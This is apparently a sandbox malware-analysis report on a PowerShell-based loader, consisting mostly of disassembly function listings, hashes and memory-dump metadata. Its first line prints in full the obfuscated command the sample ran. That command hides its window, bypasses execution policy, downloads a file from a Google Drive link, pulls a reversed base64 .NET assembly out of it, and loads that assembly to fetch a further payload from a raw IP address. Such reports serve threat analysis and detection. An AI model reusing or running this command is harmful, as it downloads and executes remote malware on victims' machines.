                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
                                    Imagebase:0x690000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Executed Functions

                                      Function 05E30FE7 Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000003.2073896812.0000000005E30000.00000010.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_3_5e30000_mshta.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                      • Instruction ID: 7155c1c0b78508aea024ae5550b88a59f175a26d1aea84070b9cdb8f75a8b2a1
                                      • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                      • Instruction Fuzzy Hash:
                                      Function 05E30FCF Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000003.2073896812.0000000005E30000.00000010.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_3_5e30000_mshta.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                      • Instruction ID: 7155c1c0b78508aea024ae5550b88a59f175a26d1aea84070b9cdb8f75a8b2a1
                                      • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                      • Instruction Fuzzy Hash:
                                      Function 05E30FD7 Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000003.2073896812.0000000005E30000.00000010.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_3_5e30000_mshta.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                      • Instruction ID: 7155c1c0b78508aea024ae5550b88a59f175a26d1aea84070b9cdb8f75a8b2a1
                                      • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                      • Instruction Fuzzy Hash:
                                      Function 05E30FDF Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000003.2073896812.0000000005E30000.00000010.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_3_5e30000_mshta.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                      • Instruction ID: 7155c1c0b78508aea024ae5550b88a59f175a26d1aea84070b9cdb8f75a8b2a1
                                      • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                      • Instruction Fuzzy Hash:

                                      Executed Functions

                                      Function 04714B90 Relevance: 2.0, APIs: 1, Instructions: 488COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2211986598.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4710000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 172919b71c74d5d1376a41b253bb8e1f6c785bf09bb8f5848727992f71242844
                                      • Instruction ID: 79a8fd60af1fde6616a52d7611aeb9dd488ed2caf36065612a6479351dad9b64
                                      • Opcode Fuzzy Hash: 172919b71c74d5d1376a41b253bb8e1f6c785bf09bb8f5848727992f71242844
                                      • Instruction Fuzzy Hash: F0223A74A00219AFCB05CFACD984A9EBBF2FF88310F248559E915AB365C735ED41CB90
                                      Function 074C1178 Relevance: 2.9, Strings: 2, Instructions: 436COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2236529752.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_74c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: tP]q$tP]q
                                      • API String ID: 0-145478062
                                      • Opcode ID: 6b7507a2c29a7e183d12603040c25a7d26f28a528a8230d8a550ef7a5b2c2436
                                      • Instruction ID: 46e9489528709c132029116df5cb5f822a459a596f61aaebe50eb00f56212c11
                                      • Opcode Fuzzy Hash: 6b7507a2c29a7e183d12603040c25a7d26f28a528a8230d8a550ef7a5b2c2436
                                      • Instruction Fuzzy Hash: 67F108F87002099FDB14DF6CC450AAABBE2EFC5714F24846EE9059B392DA31DC46C7A1
                                      Function 074C04F8 Relevance: 2.7, Strings: 2, Instructions: 158COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2236529752.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_74c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: tP]q$tP]q
                                      • API String ID: 0-145478062
                                      • Opcode ID: 86c2e1a0d155ced5429bc5b6057372250370a2fff30c68cfea0eca66bf40a1d6
                                      • Instruction ID: 28271ce999cb1c98c164535566103ff6b1e3ec9e3ecc483747060c9471adb2fb
                                      • Opcode Fuzzy Hash: 86c2e1a0d155ced5429bc5b6057372250370a2fff30c68cfea0eca66bf40a1d6
                                      • Instruction Fuzzy Hash: 665155B5B00214DFC714DBA888507AABBE6EF85710F15882FE985DF3A1CA31DC05C7A1
                                      Function 04711A27 Relevance: 1.6, APIs: 1, Instructions: 69filenetworkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 047151A9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2211986598.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4710000_powershell.jbxd
                                      Similarity
                                      • API ID: DownloadFile
                                      • String ID:
                                      • API String ID: 1407266417-0
                                      • Opcode ID: 90ed986e1e91cad01f83f7b144cbade02a709e265fe8fc2504ccb4805ac96925
                                      • Instruction ID: b00edc6b52b73a37b8b4bee9f39a0658915ed548066401b2211ea72876195a39
                                      • Opcode Fuzzy Hash: 90ed986e1e91cad01f83f7b144cbade02a709e265fe8fc2504ccb4805ac96925
                                      • Instruction Fuzzy Hash: 442113B1D01659EFCB05CF9AD984ADEFBB4FF48310F10812AE918A7310D375AA54CBA0
                                      Function 074C115C Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2236529752.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_74c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: tP]q
                                      • API String ID: 0-2175968468
                                      • Opcode ID: 8ee89245b55861470b559cac007d2aaf72829ebe865057b370f5f2269c3fa3e7
                                      • Instruction ID: 52db27923128b4fc78235f2fea524c7a59360ce8715f5e1f05a43442cab9f0b0
                                      • Opcode Fuzzy Hash: 8ee89245b55861470b559cac007d2aaf72829ebe865057b370f5f2269c3fa3e7
                                      • Instruction Fuzzy Hash: 4291A3F8A00209DFDB54CF58C540BAABBB2FB85714F15846EE905AB392DA31DC41CB91
                                      Function 0457D01D Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2211147981.000000000457D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0457D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_457d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4ab08b4c51eb651072682e8403bfb07aebeed7b2baaef8fa82e3650faa998652
                                      • Instruction ID: ead20ce8013911e9107e9ebd2a5530867bed5636da83085834f7a6a2f6b88de1
                                      • Opcode Fuzzy Hash: 4ab08b4c51eb651072682e8403bfb07aebeed7b2baaef8fa82e3650faa998652
                                      • Instruction Fuzzy Hash: 0001F7315043009ED7208E26FD84B67BFA8FF46320F18D43AED480A246E279A849D6B1
                                      Function 0457D006 Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2211147981.000000000457D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0457D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_457d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 482a6128f0023004816c753959031161f8825194d47b7a35a2357cf2ccce014b
                                      • Instruction ID: a8ca1640b4cd9e0570b273c57a61a017b035dc22dc51fd6b8809404e801a7866
                                      • Opcode Fuzzy Hash: 482a6128f0023004816c753959031161f8825194d47b7a35a2357cf2ccce014b
                                      • Instruction Fuzzy Hash: 0E01527140E3C09ED7128B259C94B52BFB4EF53224F1D80DBD9888F293C2695849C772

                                      Non-executed Functions

                                      Function 074C0B70 Relevance: 6.4, Strings: 5, Instructions: 160COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2236529752.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_74c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$X=Gl$$]q$$]q
                                      • API String ID: 0-1851419290
                                      • Opcode ID: fe7af440c82f4a46f278f99c046afc84dd703967dbaf6d6d3c70f03cf078a390
                                      • Instruction ID: c0bc22644edc7620fc43d07e77ad7f28a8a653dc06e5dbb68786988fbfbf7aa2
                                      • Opcode Fuzzy Hash: fe7af440c82f4a46f278f99c046afc84dd703967dbaf6d6d3c70f03cf078a390
                                      • Instruction Fuzzy Hash: E751E2B9704306CFCB69CB6898106EBBBE5AF82210F1488AFC455CB375DB35D946C7A1
                                      Function 074C0080 Relevance: 5.0, Strings: 4, Instructions: 42COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2236529752.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_74c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$$]q$$]q
                                      • API String ID: 0-978391646
                                      • Opcode ID: e88fb132758e6225ca091f5a451854f74c905a2584eeadf30abf671def5b999d
                                      • Instruction ID: faa36d1b1101a65b4ee7438a8db1330a2583669f8fee8bd2cb42be2bbc9d6f02
                                      • Opcode Fuzzy Hash: e88fb132758e6225ca091f5a451854f74c905a2584eeadf30abf671def5b999d
                                      • Instruction Fuzzy Hash: 2C01AD6174D385CFD76B47692C3016A6FB66F8394032B84EBC5D1DB2A3CA594C0683A2

                                      Executed Functions

                                      Function 07911C10 Relevance: 5.6, Strings: 4, Instructions: 575COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2103304453.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7910000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$4']q$4']q
                                      • API String ID: 0-1785108022
                                      • Opcode ID: ed7c9f200911bf915f5483af49ae144b86894e8ee5b2b10e33ecb664e16c4849
                                      • Instruction ID: fbc64cff5cd585e0b7fece6e7bff2bba6829e9024e964437a6f98c311fbdbb38
                                      • Opcode Fuzzy Hash: ed7c9f200911bf915f5483af49ae144b86894e8ee5b2b10e33ecb664e16c4849
                                      • Instruction Fuzzy Hash: FD128BB074420D9FCB159B68881177A7BAAEFD2315F14C4BAD605CF392DB31C962C3A2
                                      Function 04A829F0 Relevance: .2, Instructions: 210COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2098559672.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4a80000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 58a69abb4e39726ae4dc2026f044c01cc056532223a04ce640ab5352fe2fae99
                                      • Instruction ID: 34684c658f811213fec6f5dc5a6bb782c45728a9e30df50106d25c01583fbf3e
                                      • Opcode Fuzzy Hash: 58a69abb4e39726ae4dc2026f044c01cc056532223a04ce640ab5352fe2fae99
                                      • Instruction Fuzzy Hash: 6A919A75A002058FCB15CF59C5D4ABAFBB1FF88310B248599D815AB3A5C736FC91CBA0
                                      Function 07911BEF Relevance: .1, Instructions: 125COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2103304453.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7910000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 58c6ecd71f6388d08c2e6e6fc748f3c10d464f3cb4a9285b7260d727d01861cd
                                      • Instruction ID: f5786b71f2703d97ee1fe4e3487bcff977dfd7d1318f48b7ba062c3416e65453
                                      • Opcode Fuzzy Hash: 58c6ecd71f6388d08c2e6e6fc748f3c10d464f3cb4a9285b7260d727d01861cd
                                      • Instruction Fuzzy Hash: CB4126F4A4420EAFCB158F14C541BB97BB6EF91208F5980B9DA049F292D731DD62C7A1
                                      Function 04A84C20 Relevance: .1, Instructions: 113COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2098559672.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4a80000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 15b5bffd5a785bfc30215f22a95ae43f10c9529fdfc15493486d27c916e0f8ed
                                      • Instruction ID: 95ec14db65dfb3310a531d622721272cf12f44688f0a05fbcf4a268797967877
                                      • Opcode Fuzzy Hash: 15b5bffd5a785bfc30215f22a95ae43f10c9529fdfc15493486d27c916e0f8ed
                                      • Instruction Fuzzy Hash: B541D4B0A093819FC702DF6CC8A566ABFF4FF9A300F0944DAD085DB293D625A806C791
                                      Function 04A82B00 Relevance: .1, Instructions: 109COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2098559672.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4a80000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3cdb101f36f5d2a3c157395a7b48be6bb71cc0fbd92251e0dad8654cf041b144
                                      • Instruction ID: 75e7194e7a2e9cc50b8a5acca6ef55bd5cb9193828af4c4227c554193eb9391e
                                      • Opcode Fuzzy Hash: 3cdb101f36f5d2a3c157395a7b48be6bb71cc0fbd92251e0dad8654cf041b144
                                      • Instruction Fuzzy Hash: A94147B5A005059FCB06CF59C2D8ABAFBB1FF48310B158699D815AB364C732FC91CBA0
                                      Function 04A84C18 Relevance: .1, Instructions: 55COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2098559672.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4a80000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2ac3ade00a324a933c8fe5da2d2e2c8efe211a5e0d49f62adac179262c2b901e
                                      • Instruction ID: 6d9905a018477864af267f6d6937df14403d81578d9c2bd0f62582ca06f5194a
                                      • Opcode Fuzzy Hash: 2ac3ade00a324a933c8fe5da2d2e2c8efe211a5e0d49f62adac179262c2b901e
                                      • Instruction Fuzzy Hash: 7111F9B4A0020A9FCB44DF9CD5809AAFBF5FF89310B1485A9E809AB351C331ED41CBA1
                                      Function 0304D006 Relevance: .0, Instructions: 47COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2097866055.000000000304D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0304D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_304d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d03784845441a4b34203f8142e82c0eeb58138e489350fd0447defbbea96750e
                                      • Instruction ID: d426b8184ecf64e3de31ee395d484150fbe604371884dfc7fdbc98447c7b460f
                                      • Opcode Fuzzy Hash: d03784845441a4b34203f8142e82c0eeb58138e489350fd0447defbbea96750e
                                      • Instruction Fuzzy Hash: 25018CB240E3C09FD7128B258C84752BFA8EF43224F0D84DBE8888F2A3C2695C45C772
                                      Function 0304D01D Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2097866055.000000000304D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0304D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_304d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4b151ac1de983898e5dc85103b6a7fe0ec001960a297a84e40992ae5c6804977
                                      • Instruction ID: b208fd8cffd24b168eeb4a5bbb1e27b381790a8e098ada585ad3fd1778ac3f59
                                      • Opcode Fuzzy Hash: 4b151ac1de983898e5dc85103b6a7fe0ec001960a297a84e40992ae5c6804977
                                      • Instruction Fuzzy Hash: BD01D4B10063409AE720CA19C984B67FFDCEF45324F18C87AED480B247C2799941C6B1

                                      Non-executed Functions

                                      Function 07911270 Relevance: 9.2, Strings: 7, Instructions: 480COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2103304453.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7910000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                      • API String ID: 0-108373575
                                      • Opcode ID: 862f5e6056cf91ad5368577db216dba4406fcbda1008eef488a1ae9d0fd909ed
                                      • Instruction ID: e6a288fe455dc25a15d091c896ea14654c4619b92d5dcc62d2341d0805ffee0b
                                      • Opcode Fuzzy Hash: 862f5e6056cf91ad5368577db216dba4406fcbda1008eef488a1ae9d0fd909ed
                                      • Instruction Fuzzy Hash: 7AF169B1B4420DAFCB148B6CD4106AABBF9EFD2314F1484BACA06CB751DA31DD56C7A1
                                      Function 079104E0 Relevance: 9.1, Strings: 7, Instructions: 318COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2103304453.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7910000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                      • API String ID: 0-108373575
                                      • Opcode ID: 27fdfcf5b4be79ca7555a061aee0b86adc1c66784fd607b14c6227271133cd18
                                      • Instruction ID: 1518c78e3fe99b726e6cc77133b13054b9d83a0fe090af54436672d5be119059
                                      • Opcode Fuzzy Hash: 27fdfcf5b4be79ca7555a061aee0b86adc1c66784fd607b14c6227271133cd18
                                      • Instruction Fuzzy Hash: 70A169B17043198FC7158B6D982067ABBF9EFD6218F1484BBD445CB351DA33C8A5C7A1
                                      Function 07913228 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2103304453.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7910000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $]q$$]q$$]q$$]q
                                      • API String ID: 0-858218434
                                      • Opcode ID: 2db7eaaa980f0c20b62e122ed7448d529012929bf9d6fa5c566ab192d6d7adb9
                                      • Instruction ID: 0fd59a24890fa061d51ab7ebd05fd9dc6e88dcbc5ae7ac581389780b83a11a2d
                                      • Opcode Fuzzy Hash: 2db7eaaa980f0c20b62e122ed7448d529012929bf9d6fa5c566ab192d6d7adb9
                                      • Instruction Fuzzy Hash: 8B2149B131431A9BDB24666E8841B3BBBEE9FC1B18F608C7AD845CB385DD76C815C361
                                      Function 07910309 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2103304453.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7910000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$$]q$$]q
                                      • API String ID: 0-978391646
                                      • Opcode ID: bfe537fd6dc0e0180ed8db0d8ad0961ba89a9e60f937e08f84db4f3db3d04c9c
                                      • Instruction ID: 5b73619e92814b3c17ed7c3ee65c9a81d5d5770eda1c0ff83a13936f26336b74
                                      • Opcode Fuzzy Hash: bfe537fd6dc0e0180ed8db0d8ad0961ba89a9e60f937e08f84db4f3db3d04c9c
                                      • Instruction Fuzzy Hash: CA0176713082499FC73E031C58307A56FBAAFC2A14B5A46A7C080CFB42CD1A4C53C3A2

                                      Executed Functions

                                      Function 0423D01D Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2221748029.000000000423D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0423D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_423d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a87c6e60d2ba4db931df9da1d336db0d9e405ed81e3fbee095b22146ecb4cd1e
                                      • Instruction ID: 7ebc03d9623e73df7aa7662603bff2a7c0b3c498617f88d62e3fb072567505e3
                                      • Opcode Fuzzy Hash: a87c6e60d2ba4db931df9da1d336db0d9e405ed81e3fbee095b22146ecb4cd1e
                                      • Instruction Fuzzy Hash: 55012BB16243049AE7208F25DD84B67BFECEF45721F18C429ED480B246C279A841CBB1
                                      Function 0423D006 Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2221748029.000000000423D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0423D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_423d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0db0d37a7c516197248df8dbdcd47e05393678a46ba5bcbba5e89095826209ae
                                      • Instruction ID: 660cc64b00d49b2d97c7ae42960a8c38c18614d9800a1cd467c7eb07da1a39bd
                                      • Opcode Fuzzy Hash: 0db0d37a7c516197248df8dbdcd47e05393678a46ba5bcbba5e89095826209ae
                                      • Instruction Fuzzy Hash: C0015E7210E3C09ED7128B25DC94B52BFB4EF47625F1D80DBD9888F2A3C2699849C772
                                      Function 04723006 Relevance: .0, Instructions: 29COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2222458707.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_4720000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d8af7e1fb269bf35ab7165dfaaf89a964d044dcd47001a68bcda7211eb24342a
                                      • Instruction ID: 637108e050f2228a40cdf6bf6f3d119d0aca14ce4c6c62a7e13f0a90e58a4bfc
                                      • Opcode Fuzzy Hash: d8af7e1fb269bf35ab7165dfaaf89a964d044dcd47001a68bcda7211eb24342a
                                      • Instruction Fuzzy Hash: CAF0B235A001199FCB15CB9DD990AEEF7B2FF88324F208159E515A72A1C736A862CB60

                                      Non-executed Functions

                                      Function 04720F6D Relevance: .3, Instructions: 270COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2222458707.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_4720000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 24873abe84817ce89d5ceaf0ee90ff526e126edfdd495220ceb6d02caefd9dc6
                                      • Instruction ID: 4cdc306bc41106a20c68449f70c354e02d19ef4cf8744926e8de22203aa56d06
                                      • Opcode Fuzzy Hash: 24873abe84817ce89d5ceaf0ee90ff526e126edfdd495220ceb6d02caefd9dc6
                                      • Instruction Fuzzy Hash: E871152299E3E02FE303A77C5976BC53F659F43614F4A01D7C5C48E8E39A884849C3AA

                                      Executed Functions

                                      Function 07772930 Relevance: 8.3, Strings: 6, Instructions: 778COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2215233454.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7770000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                      • API String ID: 0-471056614
                                      • Opcode ID: a2d21b97528d280917163fcaecb99f3f0801f4148658f38ceb2710de36661a26
                                      • Instruction ID: d4c0ef93c0b9a170b09b2305b694432553c96ffc739edaaeffc80776642e15eb
                                      • Opcode Fuzzy Hash: a2d21b97528d280917163fcaecb99f3f0801f4148658f38ceb2710de36661a26
